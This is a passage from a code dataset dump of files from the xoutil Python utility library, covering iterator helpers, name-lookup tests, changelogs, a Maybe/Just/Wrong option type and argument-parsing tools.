iter_delete_duplicates(iter, key=lambda x: x):\n \"\"\"Yields non-repeating (and consecutive) items from `iter`.\n\n `key` has the same meaning as in `delete_duplicates`:func:.\n\n Examples:\n\n >>> list(iter_delete_duplicates('AAAaBBBA'))\n ['A', 'a', 'B', 'A']\n\n >>> list(iter_delete_duplicates('AAAaBBBA', key=lambda x: x.lower()))\n ['A', 'B', 'A']\n\n .. versionadded:: 1.7.4\n\n \"\"\"\n last = object() # a value we're sure `iter` won't produce\n for x in iter:\n k = key(x)\n if k != last:\n yield x\n last = k\n\n\ndef iter_without_duplicates(it, key=lambda x: x):\n \"\"\"Yields non-repeating items from `iter`.\n\n `key` has the same meaning as in `delete_duplicates`:func:.\n\n The difference between this function and `iter_delete_duplicates`:func: is\n that we ensure the same item (as per `key`) is produced only once; while\n `iter_delete_duplicates`:func: only remove consecutive repeating items.\n\n Example:\n\n >>> list(iter_without_duplicates('AAAaBBBA', key=lambda x: x.lower()))\n ['A', 'B']\n\n\n \"\"\"\n done = set()\n for what in it:\n k = key(what)\n if k not in done:\n yield what\n done.add(k)\n\n\ndef slides(iterable, width=2, fill=None):\n \"\"\"Creates a sliding window of a given `width` over an iterable::\n\n >>> list(slides(range(1, 11)))\n [(1, 2), (3, 4), (5, 6), (7, 8), (9, 10)]\n\n If the iterator does not yield a width-aligned number of items, the last\n slice returned is filled with `fill` (by default None)::\n\n >>> list(slides(range(1, 11), width=3)) # doctest: +ELLIPSIS\n [(1, 2, 3), (4, 5, 6), (7, 8, 9), (10, None, None)]\n\n .. versionchanged:: 1.4.0 If the `fill` argument is a collection is cycled\n over to get the filling, just like in `first_n`:func:.\n\n .. versionchanged:: 1.4.2 The `fill` argument now defaults to None,\n instead of Unset.\n\n \"\"\"\n from itertools import cycle, repeat\n from collections import Iterable\n\n pos = 0\n res = []\n iterator = iter(iterable)\n current = next(iterator, Unset)\n while current is not Unset:\n if pos < width:\n res.append(current)\n current = next(iterator, Unset)\n pos = pos + 1\n else:\n yield tuple(res)\n res = []\n pos = 0\n if res:\n if isinstance(fill, Iterable):\n fill = cycle(fill)\n else:\n fill = repeat(fill)\n while pos < width:\n res.append(next(fill))\n pos += 1\n yield tuple(res)\n\n\ndef continuously_slides(iterable, width=2, fill=None):\n \"\"\"Similar to `slides`:func: but moves one item at the time (i.e\n continuously).\n\n `fill` is only used to fill the fist chunk if the `iterable` has less\n items than the `width` of the window.\n\n Example (generate a texts tri-grams)::\n\n >>> slider = continuously_slides(str('maupassant'), 3)\n >>> list(str('').join(chunk) for chunk in slider)\n ['mau', 'aup', 'upa', 'pas', 'ass', 'ssa', 'san', 'ant']\n\n \"\"\"\n i = iter(iterable)\n res = []\n while len(res) < width:\n current = next(i, fill)\n res.append(current)\n yield tuple(res)\n current = next(i, Unset)\n while current is not Unset:\n res.pop(0)\n res.append(current)\n yield tuple(res)\n current = next(i, Unset)\n\n\n@deprecated(\n None,\n \"first_n is deprecated and it will be removed, use stdlib's itertools.islice\",\n)\ndef first_n(iterable, n=1, fill=Unset):\n \"\"\"Takes the first `n` items from iterable.\n\n If there are less than `n` items in the iterable and `fill` is\n `~xotl.tools.symbols.Unset`:class:, a StopIteration exception is raised;\n otherwise it's used as a filling pattern as explained below.\n\n .. deprecated:: 2.1.6 Use `itertools.islice`:func:, if you need `fill` you\n can also use `itertools.cycle`:func: or `itertools.repeat`:func:.\n\n :param iterable: An iterable from which the first `n` items should be\n collected.\n\n :param n: The number of items to collect\n :type n: int\n\n :param fill: The filling pattern to use. It may be:\n\n - a collection, in which case `first_n` fills the last items\n by cycling over `fill`.\n\n - anything else is used as the filling pattern by repeating.\n\n :returns: The first `n` items from `iterable`, probably with a filling\n pattern at the end.\n :rtype: generator object\n\n .. versionadded:: 1.2.0\n\n .. versionchanged:: 1.4.0 The notion of collection for the `fill` argument\n uses ``xotl.tools.types.is_collection`` instead of\n probing for the ``__iter__`` method.\n\n .. versionchanged:: 1.7.2 The notion of collection for the `fill` argument\n uses ``isinstance(fill, Iterable)`` replacing\n ``xotl.tools.types.is_collection``. We must be\n consistent with `iterable` argument that allow an\n string as a valid iterable and `is_collection` not.\n\n \"\"\"\n from itertools import islice\n\n if fill is not Unset:\n from collections import Iterable\n from itertools import cycle, repeat, chain\n\n if isinstance(fill, Iterable):\n fill = cycle(fill)\n else:\n fill = repeat(fill)\n seq = chain(iterable, fill)\n else:\n seq = iter(iterable)\n return islice(seq, n)\n\n\ndef ungroup(iterator):\n \"\"\"Reverses the operation of `itertools.groupby`:func: (or similar).\n\n The `iterator` should produce pairs of ``(_, xs)``; where ``xs`` is\n another iterator (or iterable).\n\n It's guaranteed that the `iterator` will be consumed at the *boundaries*\n of each pair, i.e. before taking another pair ``(_, ys)`` from `iterator`\n the first ``xs`` will be fully yielded.\n\n Demonstration:\n\n >>> def groups():\n ... def chunk(s):\n ... for x in range(s, s+3):\n ... print('Yielding x:', x)\n ... yield x\n ...\n ... for g in range(2):\n ... print('Yielding group', g)\n ... yield g, chunk(g)\n\n >>> list(ungroup(groups()))\n Yielding group 0\n Yielding x: 0\n Yielding x: 1\n Yielding x: 2\n Yielding group 1\n Yielding x: 1\n Yielding x: 2\n Yielding x: 3\n [0, 1, 2, 1, 2, 3]\n\n This is not the same as::\n\n >>> import itertools\n >>> xs = itertools.chain(*(xs for _, xs in groups()))\n Yielding group 0\n Yielding group 1\n\n Notice that the iterator was fully consumed just to create the arguments\n to ``chain()``.\n\n .. versionadded:: 1.7.3\n\n \"\"\"\n for _, xs in iterator:\n for x in xs:\n yield x\n\n\nif sys.version_info < (3, 5):\n\n class _safeitem:\n __slots__ = [\"item\", \"key\"]\n\n def __init__(self, item, key=None):\n self.item = item\n self.key = key or (lambda x: x)\n\n def __le__(self, other):\n return self.key(self.item) <= self.key(other.item)\n\n def __lt__(self, other):\n return self.key(self.item) < self.key(other.item)\n\n def __ge__(self, other):\n return self.key(self.item) >= self.key(other.item)\n\n def __gt__(self, other):\n return self.key(self.item) > self.key(other.item)\n\n def __eq__(self, other):\n return self.key(self.item) == self.key(other.item)\n\n def merge(*iterables, key=None):\n \"\"\"Merge the iterables in order.\n\n Return an iterator that yields all items from `iterables` following\n the order given by `key`. If `key` is not given we compare the items.\n\n If the `iterables` yield their items in order (w.r.t `key`), the\n result is also ordered (like a merge sort).\n\n ``merge()`` returns the *empty* iterator.\n\n .. versionadded:: 1.8.4\n\n .. versionchanged:: 2.1.0 Based on `heapq.merge`:func:. In Python\n 3.5+, this is just an alias of it.\n\n \"\"\"\n from heapq import merge # noqa\n\n if key is None:\n key = lambda x: x\n params = ((_safeitem(x, key) for x in iter_) for iter_ in iterables)\n for x in merge(*params):\n yield x.item\n\n\nelse:\n from heapq import merge # noqa\n\ndel sys\n" }, { "alpha_fraction": 0.6473551392555237, "alphanum_fraction": 0.6506296992301941, "avg_line_length": 32.64406967163086, "blob_id": "ba65f1438375376c1de765c2f6ba724b6c28e837", "content_id": "efde5a6d0dd49695fa7862c090481e01ec17e6c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3971, "license_type": "no_license", "max_line_length": 87, "num_lines": 118, "path": "/tests/test_names.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport pytest\nfrom xoutil.versions import python_version\nfrom xoutil.future.collections import OrderedSmartDict\n\nPYPY = python_version.pypy\n\n\ndef test_nameof():\n from xoutil.names import nameof, simple_name\n from collections import OrderedDict as sorted_dict\n\n assert nameof(sorted_dict) == \"sorted_dict\"\n assert nameof(sorted_dict, inner=True) == \"OrderedDict\"\n sd = sorted_dict(x=1, y=2)\n assert nameof(sd) == \"sd\"\n assert nameof(sd, typed=True) == \"sorted_dict\"\n assert nameof(sd, inner=True, typed=True) == \"OrderedDict\"\n s = \"foobar\"\n assert nameof(s, inner=True) == \"foobar\"\n # The following needs to be tested outside the assert, cause in Py3.3,\n # py.test rewrites the assert sentences and the local scope `nameof`\n # searched is not reached properly.\n passed = nameof(\"foobar\") == \"s\"\n assert passed\n\n i = 1\n assert nameof(i) == \"i\"\n assert nameof(i, inner=True) == \"1\"\n assert nameof(i, typed=True) == \"int\"\n assert hex(id(sd)) in nameof(sd, inner=True)\n values = (None, True, False, BaseException, int, dict, object)\n names = [simple_name(v) for v in values]\n names.sort()\n assert names == [\"BaseException\", \"False\", \"None\", \"True\", \"dict\", \"int\", \"object\"]\n\n\ndef test_nameof_methods():\n from xoutil.names import nameof, simple_name\n\n class Foobar:\n def __init__(self):\n self.attr = \"foobar\"\n\n def first(self):\n pass\n\n @staticmethod\n def second():\n pass\n\n @classmethod\n def third(cls):\n pass\n\n obj = Foobar()\n attrs = (getattr(obj, n) for n in dir(obj) if not n.startswith(\"_\"))\n attrs = (v for v in attrs if callable(v))\n names = nameof(*attrs)\n names.sort()\n assert names == [\"first\", \"second\", \"third\"]\n attrs = (getattr(obj, n) for n in dir(obj) if not n.startswith(\"_\"))\n attrs = (v for v in attrs if callable(v))\n names = [simple_name(v, join=False) for v in attrs]\n names.sort()\n assert names == [\"first\", \"second\", \"third\"]\n\n\[email protected](PYPY, reason=\"'OrderedDict' is in '_pypy_collections'\")\ndef test_fullnameof():\n from xoutil.names import nameof, simple_name\n\n _name = \"collections.OrderedDict\"\n from collections import OrderedDict as sorted_dict\n\n assert nameof(sorted_dict, full=True) == \"test_fullnameof.sorted_dict\"\n assert nameof(sorted_dict, inner=True, full=True) == _name\n sd = sorted_dict(x=1, y=2)\n assert nameof(sd, full=True) == \"test_fullnameof.sd\"\n assert nameof(sd, typed=True, full=True) == \"test_fullnameof.sorted_dict\"\n assert nameof(sd, inner=True, typed=True, full=True) == _name\n assert simple_name(simple_name) == \"xotl.tools.names.simple_name\"\n assert simple_name(sd) == \"collections.OrderedDict\"\n\n\[email protected](PYPY, reason=\"'OrderedDict' is in '_pypy_collections'\")\ndef test_fullnameof_no_rename():\n from xoutil.names import nameof\n from collections import OrderedDict\n\n _full_name = \"test_fullnameof_no_rename.OrderedDict\"\n _name = \"collections.OrderedDict\"\n assert nameof(OrderedDict, full=True) == _full_name\n assert nameof(OrderedDict, inner=True, full=True) == _name\n\n\ndef test_module_level_name():\n from xoutil.names import nameof\n\n assert nameof(OrderedSmartDict) == \"OrderedSmartDict\"\n assert nameof(OrderedSmartDict, typed=True) == \"OrderedSmartDict\"\n\n\ndef test_module_level_name_isolated():\n from xoutil.names import nameof, simple_name\n\n full_name_1 = \"test_names.OrderedSmartDict\"\n full_name_2 = \"xotl.tools.future.collections.OrderedSmartDict\"\n assert nameof(OrderedSmartDict, full=True) == full_name_1\n assert simple_name(OrderedSmartDict) == full_name_2\n" }, { "alpha_fraction": 0.7111111283302307, "alphanum_fraction": 0.7155555486679077, "avg_line_length": 34.52631759643555, "blob_id": "743d785f86ac1484a3a42899c64adddcaaf40231", "content_id": "5554b5f181fe53ca6cf6ebaa3066ecae0ca3c688", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1350, "license_type": "permissive", "max_line_length": 79, "num_lines": 38, "path": "/docs/source/history/changes-1.4.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Deprecations and introductions:\n\n - Importing `xoutil.Unset`:data: and `xoutil.Ignored`:data: from\n `xoutil.types`:mod: now issues a warning.\n\n - New style for declaring portable metaclasses in\n `xoutil.objects.metaclass`:func:, so\n `xoutil.decorator.compat.metaclass`:func: is now deprecated.\n\n - Adds the module `xoutil.pprint`:mod: and function\n `xoutil.pprint.ppformat`:func:.\n\n - Adds the first version of package `xoutil.cli`:mod:.\n\n - Adds the `filter` parameter to functions `xoutil.objects.xdir`:func: and\n `xoutil.objects.fdir`:func: and deprecates `attr_filter` and\n `value_filter`.\n\n - Adds functions `xoutil.objects.attrclass`:func:,\n `xoutil.objects.fulldir`:func:.\n\n - Adds function `xoutil.iterators.continuously_slides`:func:.\n\n - Adds package `xoutil.threading`:mod:.\n\n - Adds package ``xoutil.html`` module and begins the port of\n ``xoutil.html.parser`` from Python 3.3 to xoutil, so that a common\n implementation for both Python 2.7 and Python 3.3 is available.\n\n- Bug fixes:\n\n - Fixes some errors with `classical <!xoutil.aop.classical>`:mod: AOP weaving\n of functions in modules that where `customized\n <xoutil.modules.customize>`:func:.\n\n - Fixes bugs with `xoutil.modules`:mod:: makes\n `xoutil.modules.modulemethod`:func: to customize the module, and improves\n performance.\n" }, { "alpha_fraction": 0.7223719954490662, "alphanum_fraction": 0.7243935465812683, "avg_line_length": 33.511627197265625, "blob_id": "52707a90c6067226e2618aa9e13ee6a1331a89b3", "content_id": "0c5eee036e3d877bb0f7fdb5ccb5b1ed67346b76", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1484, "license_type": "permissive", "max_line_length": 78, "num_lines": 43, "path": "/docs/source/history/changes-1.4.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Refactors `xoutil.types`:mod: as explained in ``types-140-refactor``.\n\n- Changes involving `xoutil.collections`:mod:\\ :\n\n - Moves SmartDict and SortedSmartDict from `xoutil.data`:mod: to\n `xoutil.collections`:mod:. They are still accessible from\n `!xoutil.data`:mod:.\n\n - Also there is now a `xoutil.collections.SmartDictMixin`:class: that\n implements the `update` behind all smart dicts in xoutil.\n\n - `xoutil.collections.StackedDict`:class: in now a SmartDict and thus gains\n zero-level initialization data.\n\n- Removals of deprecated, poorly tested, or incomplete features:\n\n - Removes deprecated `!xoutil.decorators`:mod:. Use\n `xoutil.decorator`:mod:.\n\n - Removed `!xoutil.iterators.first`:func:, and\n `!xoutil.iterators.get_first`:func:.\n\n - Removed `!xoutil.string.names`:func:,\n `!xoutil.string.normalize_to_str`:func: and\n `!xoutil.string.normalize_str_collection`:func:.\n\n- Newly deprecated functions:\n\n - Deprecates `xoutil.iterators.obtain`:func:.\n\n - Deprecates `xoutil.iterators.smart_dict`:func: and\n `xoutil.data.smart_copy` in favor of `xoutil.objects.smart_copy`:func:.\n\n- New features:\n\n - Introduces `xoutil.iterators.first_non_null`:func:.\n\n - Adds `xoutil.objects.copy_class`:func: and updates\n `xoutil.decorator.compat.metaclass`:func: to use it.\n\n- Fixes a bug with `xoutil.deprecation.deprecated`:func: when used with\n classes: It changed the hierarchy and provoked infinite recursion in methods\n that use `super`.\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.739130437374115, "avg_line_length": 45, "blob_id": "b8a0bcc9288cbfe630c7e05e3d71ad6c4cedcfd9", "content_id": "2e47f77d618cd8fff5cc6a1ed407b00e9e9c4032", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 46, "license_type": "permissive", "max_line_length": 45, "num_lines": 1, "path": "/docs/source/history/_changes-1.9.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add module `xoutil.future.contextlib`:mod:.\n" }, { "alpha_fraction": 0.569949746131897, "alphanum_fraction": 0.5743862986564636, "avg_line_length": 30.746479034423828, "blob_id": "46c8a6987d76901e51d16a8222a25326c505db12", "content_id": "6ef13e60bacacbc3933f894525c7d30436e950f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6767, "license_type": "no_license", "max_line_length": 78, "num_lines": 213, "path": "/xotl/tools/fp/option.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Functional Programming *Option Type* definition.\n\nIn Programming, and Type Theory, an *option type*, or *maybe type*, represents\nencapsulation of an optional value; e.g., it is used in functions which may or\nmay not return a meaningful value when they are applied.\n\nIt consists of either a constructor encapsulating the original value ``x``\n(written ``Just x`` or ``Some x``) or an empty constructor (called *None* or\n*Nothing*). Outside of functional programming, these are known as *nullable\ntypes*.\n\nIn our case *option type* will be the `Maybe`:class: class (the equivalent of\n`Option` in *Scala Programming Language*), the wrapper for valid values will\nbe the `Just`:class: class (equivalent of `Some` in *Scala*); and the wrapper\nfor invalid values will be the `Wrong`:class: class.\n\nInstead of *None* or *Nothing*, `Wrong` is used because two reasons:\n(1) already existence of `None` special Python value, and (2) `Wrong`:class:\nalso wraps incorrect values and can have several instances (not only a *null*\nvalue).\n\n\"\"\"\n\n\nclass Maybe:\n \"\"\"Wrapper for optional values.\n\n The Maybe type encapsulates an optional value. A value of type\n ``Maybe a`` either contains a value of type ``a`` (represented as\n ``Just a``), or it is empty (represented as ``Nothing``). Using `Maybe``\n is a good way to deal with errors or exceptional cases without resorting\n to drastic measures such as error. In this implementation we make a\n variation where a ``Wrong`` object represents a missing (with special\n value ``Nothing``) or an improper value (including errors).\n\n See descendant classes `Just`:class: and `Wrong`:class: for more\n information.\n\n This implementation combines ``Maybe`` and ``Either`` Haskell data types.\n ``Maybe`` is a means of being explicit that you are not sure that a\n function will be successful when it is executed. Conventionally, the\n usage of ``Either`` for errors uses ``Right`` when the computation is\n successful, and ``Left`` for failing scenarios.\n\n In this implementation, `Just`:class` us used for equivalence with both\n Haskell ``Just`` and ``Right`` types; `Wrong`:class: is used with the\n special value ``Nothing`` and to encapsulate errors or incorrect values\n (Haskell ``Left``).\n\n Haskell::\n\n data Maybe a = Nothing | Just a\n\n either :: (a -> c) -> (b -> c) -> Either a b -> c\n\n Case analysis for the Either type. If the value is Left a, apply the\n first function to a; if it is Right b, apply the second function to b.\n\n \"\"\"\n\n __slots__ = \"inner\"\n _singletons = [None, None, None] # False, True, None\n\n def __new__(cls, *args):\n default = cls is Just\n if len(args) == 0:\n arg = default\n elif len(args) == 1:\n arg = args[0]\n else:\n msg = '{}: receive too many arguments \"{}\"'\n raise TypeError(msg.format(cls.__name__, len(args)))\n if arg is default or arg is None and cls is Wrong:\n idx = 2 if arg is None else arg\n if cls._singletons[idx] is None:\n self = super().__new__(cls)\n self.inner = arg\n cls._singletons[idx] = self\n return cls._singletons[idx]\n elif cls is Maybe:\n return (Just if arg else Wrong)(arg)\n elif isinstance(arg, cls):\n return arg\n elif not isinstance(arg, Maybe):\n self = super().__new__(cls)\n self.inner = arg\n return self\n else:\n msg = \"re-wrapping inverted value: {}({})\"\n raise ValueError(msg.format(cls.__name__, arg))\n\n def __init__(self, *args):\n pass\n\n def __nonzero__(self):\n return isinstance(self, Just)\n\n __bool__ = __nonzero__\n\n def __str__(self):\n return \"{}({!r})\".format(type(self).__name__, self.inner)\n\n __repr__ = __str__\n\n def __eq__(self, other):\n return (\n isinstance(other, type(self))\n and self.inner == other.inner\n or self.inner is other\n ) # TODO: check if `==` instead `is`\n\n def __ne__(self, other):\n return not (self == other)\n\n @classmethod\n def compel(cls, value):\n \"\"\"Coerce to the correspondent logical Boolean value.\n\n `Just`:class: is logically true, and `Wrong` is false.\n\n For example::\n\n >>> Just.compel([1])\n [1]\n\n >>> Just.compel([])\n Just([])\n\n >>> Wrong.compel([1])\n Wrong([1])\n\n >>> Wrong.compel([])\n []\n\n \"\"\"\n if cls is not Maybe:\n test = cls is Just\n dual = Wrong if test else Just\n if bool(value) is test:\n return value\n elif not isinstance(value, dual):\n return cls(value)\n else:\n msg = '''a \"{}\" value can't be coerced to \"{}\"'''\n vname = type(value).__name__\n raise TypeError(msg.format(vname, cls.__name__))\n else:\n raise TypeError(\"\"\"don't call at Maybe base level\"\"\")\n\n @classmethod\n def choose(cls, *types):\n \"\"\"Decorator to force `Maybe` values constraining to expecting types.\n\n For example, a function that return a collection (tuple or list) if\n valid or False if not, if not decorated could be ambiguous for an\n empty collection::\n\n >>> @Just.choose(tuple, list)\n ... def check_range(values, min, max):\n ... if isinstance(values, (tuple, list)):\n ... return [v for v in values if min <= v <= max]\n ... else:\n ... return False\n\n >>> check_range(range(10), 7, 17)\n [7, 8, 9]\n\n >>> check_range(range(10), 17, 27)\n Just([])\n\n >>> check_range(set(range(10)), 7, 17)\n False\n\n \"\"\"\n pass\n\n\nclass Just(Maybe):\n \"\"\"A wrapper for valid results.\"\"\"\n\n __slots__ = ()\n\n\nclass Wrong(Maybe):\n \"\"\"A wrapper for invalid results.\"\"\"\n\n __slots__ = ()\n\n\ndef take(value):\n \"\"\"Extract a value.\"\"\"\n return value.inner if isinstance(value, Maybe) else value\n\n\n# ---- special singletons ----\n\n#: A `Wrong`:class: special singleton encapsulating the `False` value.\nfalse = Wrong()\n\n#: A `Just`:class: special singleton encapsulating the `True` value.\ntrue = Just()\n\n#: A `Wrong`:class: special singleton encapsulating the `None` value.\nnone = Wrong(None)\n" }, { "alpha_fraction": 0.7016128897666931, "alphanum_fraction": 0.7177419066429138, "avg_line_length": 48.599998474121094, "blob_id": "606ae2b08df108eebfc77c8b0d3039794afbd27b", "content_id": "33241627cc573dc906d151b1684c09ae7132c317", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 248, "license_type": "permissive", "max_line_length": 73, "num_lines": 5, "path": "/docs/source/history/_changes-1.8.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add parameter 'encoding' to `~xoutil.string.slugify`:func: and\n `~xoutil.eight.string.force_ascii`:func:. (bug #25).\n\n- Stop using `locale.getpreferredencoding`:func: in\n `~xoutil.future.codecs.force_encoding`:func:. Also related to bug #25.\n" }, { "alpha_fraction": 0.7574712634086609, "alphanum_fraction": 0.7574712634086609, "avg_line_length": 44.78947448730469, "blob_id": "e1dbff2c8ffb0c429d9dd918e4af02d0ed32345f", "content_id": "231fa1a2158cb791007fa44b5f1f8b05f5facca5", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 870, "license_type": "permissive", "max_line_length": 79, "num_lines": 19, "path": "/docs/source/history/changes-1.3.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Removes deprecated module `!xoutil.mdeco`:mod:.\n\n- `xoutil.context.Context`:class: now inherit from the newly created stacked\n dict class `xoutil.collections.StackedDict`:class:. Whenever you enter a\n context a new level of the stacked dict is `pushed\n <xoutil.collections.StackedDict.push>`:meth:, when you leave the context a\n level is <xoutil.collections.StackedDict.pop>`:meth:.\n\n This also **removes** the `data` attribute execution context used to have,\n and, therefore, this is an incompatible change.\n\n- Introduces `xoutil.collections.OpenDictMixin`:class: and\n `xoutil.collections.StackedDict`:class:.\n\n- Fixes a bug in `xoutil.decorator.compat.metaclass`:func:\\ : Slots were not\n properly handed.\n\n- Fixes a bug with the simple `xoutil.collections.opendict`:class: that allowed\n to shadow methods (even `__getitem__`) thus making the dict unusable.\n" }, { "alpha_fraction": 0.5705721974372864, "alphanum_fraction": 0.5757105350494385, "avg_line_length": 31.719789505004883, "blob_id": "14913897cb961a1821a8342976da58aa5d8fa864", "content_id": "e6d946cf7088af6afe9c6d3ab4dddfdb1e3a8441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18684, "license_type": "no_license", "max_line_length": 88, "num_lines": 571, "path": "/xotl/tools/params.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tools for managing function arguments.\n\nProcess function arguments could be messy when a flexible schema is needed.\nWith this module you can outline parameters schema using a smart way of\nprocessing actual arguments:\n\nA parameter row (see `ParamSchemeRow`:class:), allow several keywords IDs (one\nis required used as the final identifier for the actual argument). Also\ninteger IDs expressing logical order for positional argument passing (negative\nvalues are for right-to-left indexing, like in sequences). Several values\nmeans several possibilities.\n\n.. versionadded:: 1.8.0\n\n\"\"\"\n\n\n#: The maximum number of positional arguments allowed when calling a function.\nMAX_ARG_COUNT = 1024 * 1024 # just any large number\n\nfrom xotl.tools.symbols import Undefined # used implicitly for absent default\n\n\ndef issue_9137(args):\n \"\"\"Parse arguments for methods, fixing `issue 9137`__ (self ambiguity).\n\n There are methods that expect 'self' as valid keyword argument, this is\n not possible if this name is used explicitly::\n\n def update(self, *args, **kwds):\n ...\n\n To solve this, declare the arguments as ``method_name(*args, **kwds)``,\n and in the function code::\n\n self, args = issue_9137(args)\n\n :returns: (self, remainder positional arguments in a tuple)\n\n .. versionadded:: 1.8.0\n\n __ https://bugs.python.org/issue9137\n\n \"\"\"\n self = args[0] # Issue 9137\n args = args[1:]\n return self, args\n\n\ndef check_count(args, low, high=MAX_ARG_COUNT, caller=None):\n \"\"\"Check the positional arguments actual count against constrains.\n\n :param args: The args to check count, normally is a tuple, but an integer\n is directly accepted.\n\n :param low: Integer expressing the minimum count allowed.\n\n :param high: Integer expressing the maximum count allowed.\n\n :param caller: Name of the function issuing the check, its value is used\n only for error reporting.\n\n .. versionadded:: 1.8.0\n\n\n \"\"\"\n # TODO: Shouldn't we use the TypeError and ValueError?\n assert isinstance(low, int) and low >= 0\n assert isinstance(high, int) and high >= low\n if isinstance(args, int):\n count = args\n if count < 0:\n msg = \"check_count() don't accept a negative argument count: {}\"\n raise ValueError(msg.format(count))\n else:\n count = len(args)\n if count < low:\n error = True\n adv = \"exactly\" if low == high else \"at least\"\n if low == 1:\n aux = \"{} one argument\".format(adv)\n else:\n aux = \"{} {} arguments\".format(adv, low)\n elif count > high:\n error = True\n if low == high:\n if low == 0:\n aux = \"no arguments\"\n elif low == 1:\n aux = \"exactly one argument\"\n else:\n aux = \"exactly {} arguments\".format(low)\n elif high == 1:\n aux = \"at most one argument\"\n else:\n aux = \"at most {} arguments\".format(high)\n else:\n error = False\n if error:\n if caller:\n name = \"{}()\".format(caller)\n else:\n name = \"called function or method\"\n raise TypeError(\"{} takes {} ({} given)\".format(name, aux, count))\n\n\ndef check_default(absent=Undefined):\n \"\"\"Get a default value passed as a last excess positional argument.\n\n :param absent: The value to be used by default if no one is given.\n Defaults to `~xotl.tools.symbols.Undefined`:obj:.\n\n For example::\n\n def get(self, name, *default):\n from xotl.tools.params import check_default, Undefined\n if name in self.inner_data:\n return self.inner_data[name]\n elif check_default()(*default) is not Undefined:\n return default[0]\n else:\n raise KeyError(name)\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n def default(res=absent):\n return res\n\n return default\n\n\ndef single(args, kwds):\n \"\"\"Return a true value only when a unique argument is given.\n\n When needed, the most suitable result will be wrapped using the\n `~xotl.tools.fp.option.Maybe`:class:.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n from xotl.tools.fp.option import Just, Wrong, take\n\n if len(args) == 1 and not kwds:\n res = take(args[0])\n if not res:\n res = Just(res)\n res = Just(res)\n elif not args and len(kwds) == 1:\n res = kwds\n else:\n res = Wrong((args, kwds))\n return res\n\n\ndef pop_keyword_arg(kwargs, names, default=Undefined):\n \"\"\"Return the value of a keyword argument.\n\n :param kwargs: The mapping with passed keyword arguments.\n\n :param names: Could be a single name, or a collection of names.\n\n :param default: The default value to return if no value is found.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n from xotl.tools.objects import pop_first_of\n\n if isinstance(names, str):\n names = (names,)\n return pop_first_of(kwargs, *names, default=default)\n\n\ndef pop_keyword_values(kwargs, *names, **options):\n \"\"\"Return a list with all keyword argument values.\n\n :param kwargs: The mapping with passed keyword arguments.\n\n :param names: Each item will be a definition of keyword argument name to\n retrieve. Could be a string with a name, or a list of alternatives\n (aliases).\n\n :keyword default: Keyword only option to define a default value to be used\n in place of not given arguments. If not given, it is used\n special value `~xotl.tools.symbols.Undefined`:obj:.\n\n :keyword defaults: A dictionary with default values per argument name. If\n none is given, use `default`.\n\n .. note:: `defaults` trumps `default`.\n\n .. warning:: For the case where a single name has several\n alternatives, you may choose any of the alternatives. If you\n pass several diverging defaults for different alternatives, the\n result is undefined.\n\n :keyword ignore_error: By default, when there are remaining values in\n `kwargs`, after all names are processed, a `TypeError`:class: is\n raised. If this keyword only option is True, this function returns\n normally.\n\n Examples::\n\n >>> pop_keyword_values({'b': 1}, 'a', 'b')\n [Undefined, 1]\n\n >>> kwargs = {'a': 1, 'b': 2, 'c': 3}\n >>> try:\n ... res = pop_keyword_values(kwargs, 'a', 'b')\n ... except TypeError as error:\n ... res = error\n >>> type(res)\n TypeError\n\n >>> kwargs = {'a': 1, 'b': 2, 'c': 3}\n >>> options = dict(ignore_error=True, default=None)\n >>> pop_keyword_values(kwargs, 'a', ('B', 'b'), **options)\n [1, 2]\n\n .. versionadded:: 1.8.3\n\n \"\"\"\n default = options.get(\"default\", Undefined)\n defaults = options.get(\"defaults\", {})\n res = []\n for item in names:\n val = pop_keyword_arg(kwargs, item, default=Undefined)\n if val is Undefined:\n val = pop_keyword_arg(defaults, item, default=default)\n res.append(val)\n if kwargs and not options.get(\"ignore_error\", False):\n msg = 'calling function got unexpected keyword arguments \"{}\"'\n raise TypeError(msg.format(tuple(kwargs)))\n return res\n\n\nclass ParamManager:\n \"\"\"Function parameters parser.\n\n For example::\n\n def wraps(*args, **kwargs):\n 